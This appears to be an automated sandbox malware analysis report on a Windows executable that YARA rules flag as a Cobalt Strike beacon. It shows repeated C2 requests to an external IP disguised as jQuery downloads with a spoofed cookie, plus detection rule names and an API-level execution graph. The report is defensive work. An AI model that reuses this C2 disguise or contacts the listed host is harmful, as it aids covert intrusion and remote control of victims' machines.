                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:48 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:47 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:48 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                52192.168.2.55002845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:49 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:50 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:49 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:50 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                53192.168.2.55002945.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:51 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:51 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:51 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:51 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                54192.168.2.55003045.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:53 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:53 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:53 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:53 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                55192.168.2.55003145.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:55 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:55 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:55 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:55 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                56192.168.2.55003245.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:57 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:57 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:57 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:57 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                57192.168.2.55003345.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:35:58 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:35:59 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:35:59 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:35:59 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                58192.168.2.55003445.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:36:00 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:36:01 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:36:01 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:36:01 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Click to jump to process

                                Click to jump to process

                                Target ID:0
                                Start time:04:33:55
                                Start date:02/01/2025
                                Path:C:\Users\user\Desktop\1.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\1.exe"
                                Imagebase:0x7ff7ad040000
                                File size:526'848 bytes
                                MD5 hash:9AFAD044F9FF1201826FB08E602D3E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3273708088.000002B66A0DC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2047591169.000002B669FB0000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2047591169.000002B669FB0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.5%
                                  Dynamic/Decrypted Code Coverage:79.1%
                                  Signature Coverage:9.7%
                                  Total number of Nodes:632
                                  Total number of Limit Nodes:30
                                  execution_graph 16590 7ff7ad0418f9 malloc 16591 7ff7ad041926 SleepEx 16590->16591 16597 7ff7ad04186a 16591->16597 16594 7ff7ad04193f 16602 7ff7ad0416bc HeapCreate HeapAlloc 16594->16602 16596 7ff7ad04194e 16598 7ff7ad041896 GetMailslotInfo 16597->16598 16599 7ff7ad0418e7 16598->16599 16600 7ff7ad0418b5 16598->16600 16599->16591 16599->16594 16600->16599 16601 7ff7ad0418c3 ReadFile 16600->16601 16601->16598 16603 7ff7ad0416f9 HeapReAlloc 16602->16603 16604 7ff7ad04170d 16602->16604 16603->16604 16605 7ff7ad041740 CreateThread 16604->16605 16605->16596 16606 2b66a0bfc3e 16607 2b66a0bfc5f 16606->16607 16607->16607 16610 7ff7ad041603 16607->16610 16611 7ff7ad04160c 16610->16611 16612 7ff7ad041691 SleepEx 16611->16612 16613 7ff7ad041615 16611->16613 16614 7ff7ad099330 16612->16614 16621 7ff7ad0414d8 16613->16621 16617 7ff7ad04164a CreateFiber SwitchToFiber DeleteFiber 16619 7ff7ad0414d8 6 API calls 16617->16619 16618 7ff7ad04163b ConvertThreadToFiber 16618->16617 16620 2b66a0bfd10 16619->16620 16622 7ff7ad0414f2 16621->16622 16623 7ff7ad041544 VirtualProtect 16621->16623 16622->16623 16624 7ff7ad0415ef 16623->16624 16625 7ff7ad041575 16623->16625 16624->16617 16624->16618 16626 7ff7ad041598 GetModuleHandleA GetProcAddress 16625->16626 16627 7ff7ad0415bc 16625->16627 16626->16627 16628 7ff7ad0415d9 VirtualProtect 16627->16628 16629 7ff7ad0415c8 GetCurrentProcess NtFlushInstructionCache 16627->16629 16628->16624 16629->16628 16630 7ff7ad04184c 16633 7ff7ad0417a0 CreateFileA 16630->16633 16634 7ff7ad041841 16633->16634 16635 7ff7ad0417ea 16633->16635 16636 7ff7ad0417fe WriteFile 16635->16636 16637 7ff7ad041820 CloseHandle 16635->16637 16636->16637 16638 7ff7ad04182b Sleep SleepEx 16636->16638 16637->16634 16638->16634 16639 2b66a0cbe00 16641 2b66a0cbe1c _DllMainCRTStartup 16639->16641 16640 2b66a0cbe76 16641->16640 16642 2b66a0cbeac 16641->16642 16651 2b66a0cbca0 16641->16651 16642->16640 16680 2b66a0c5fa4 16642->16680 16644 2b66a0cbeca 16647 2b66a0c5fa4 _DllMainCRTStartup 10 API calls 16644->16647 16650 2b66a0cbef3 16644->16650 16646 2b66a0cbca0 _CRT_INIT RtlFreeHeap 16646->16640 16648 2b66a0cbee6 16647->16648 16649 2b66a0cbca0 _CRT_INIT RtlFreeHeap 16648->16649 16649->16650 16650->16640 16650->16646 16652 2b66a0cbd2f 16651->16652 16655 2b66a0cbcb2 _heap_init 16651->16655 16653 2b66a0cbd85 16652->16653 16656 2b66a0cbd33 _CRT_INIT 16652->16656 16654 2b66a0cbde8 16653->16654 16661 2b66a0cbd8a _freeptd 16653->16661 16667 2b66a0cbcbb _CRT_INIT 16654->16667 16760 2b66a0cfb68 16654->16760 16655->16667 16686 2b66a0cfd10 16655->16686 16656->16667 16726 2b66a0ca4cc 16656->16726 16661->16667 16748 2b66a0cea88 16661->16748 16663 2b66a0d24cc _ioterm RtlFreeHeap 16663->16667 16664 2b66a0cbcc7 _RTC_Initialize 16664->16667 16692 2b66a0d2e20 16664->16692 16665 2b66a0cbda7 _freeptd 16665->16667 16668 2b66a0cbdde 16665->16668 16669 2b66a0cbdc8 16665->16669 16667->16642 16757 2b66a0c979c 16668->16757 16752 2b66a0cfc4c 16669->16752 16683 2b66a0c6028 16680->16683 16684 2b66a0c5fc2 _DllMainCRTStartup 16680->16684 16681 2b66a0c600d 17005 2b66a0bba74 16681->17005 16683->16644 16684->16681 16684->16683 16685 2b66a0c5ffa VirtualFree 16684->16685 16685->16681 16687 2b66a0cfd1b _mtinit _mtinitlocks 16686->16687 16688 2b66a0cea88 _calloc_crt RtlFreeHeap 16687->16688 16691 2b66a0cfd6e 16687->16691 16689 2b66a0cfd4a _freeptd 16688->16689 16690 2b66a0cfc4c _initptd RtlFreeHeap 16689->16690 16689->16691 16690->16691 16691->16664 16693 2b66a0d2e3f 16692->16693 16696 2b66a0cbce9 16693->16696 16764 2b66a0ceb08 16693->16764 16698 2b66a0d21a0 16696->16698 16697 2b66a0c979c free RtlFreeHeap 16697->16696 16841 2b66a0ce0ec 16698->16841 16727 2b66a0ca4e3 16726->16727 16728 2b66a0ca505 16727->16728 16731 2b66a0c979c free RtlFreeHeap 16727->16731 16729 2b66a0c979c free RtlFreeHeap 16728->16729 16730 2b66a0ca514 16729->16730 16732 2b66a0ca53b 16730->16732 16734 2b66a0c979c free RtlFreeHeap 16730->16734 16731->16727 16733 2b66a0c979c free RtlFreeHeap 16732->16733 16735 2b66a0ca54a 16733->16735 16734->16730 16736 2b66a0c979c free RtlFreeHeap 16735->16736 16737 2b66a0ca55e 16736->16737 16738 2b66a0c979c free RtlFreeHeap 16737->16738 16739 2b66a0ca56a 16738->16739 16740 2b66a0ca595 16739->16740 16741 2b66a0c979c free RtlFreeHeap 16739->16741 16742 2b66a0ca5b6 16740->16742 16743 2b66a0c979c free RtlFreeHeap 16740->16743 16741->16740 16744 2b66a0ca5cf 16742->16744 16745 2b66a0c979c free RtlFreeHeap 16742->16745 16743->16742 16746 2b66a0ca600 16744->16746 16747 2b66a0c979c free RtlFreeHeap 16744->16747 16745->16744 16746->16663 16746->16667 16747->16746 16751 2b66a0ceaad 16748->16751 16750 2b66a0ceaea 16750->16665 16751->16750 16975 2b66a0d3cf0 16751->16975 16753 2b66a0ce0ec _lock RtlFreeHeap 16752->16753 16754 2b66a0cfcb2 __updatetlocinfo 16753->16754 16755 2b66a0ce0ec _lock RtlFreeHeap 16754->16755 16756 2b66a0cfcd1 __addlocaleref __updatetlocinfo 16755->16756 16756->16667 16758 2b66a0c97a1 RtlFreeHeap 16757->16758 16759 2b66a0c97bc _errno realloc 16757->16759 16758->16759 16759->16667 16761 2b66a0cfb9e 16760->16761 16762 2b66a0cfb7c _freeptd 16760->16762 16761->16667 16979 2b66a0cfa34 16762->16979 16767 2b66a0ceb30 16764->16767 16766 2b66a0ceb65 16766->16696 16766->16697 16767->16766 16768 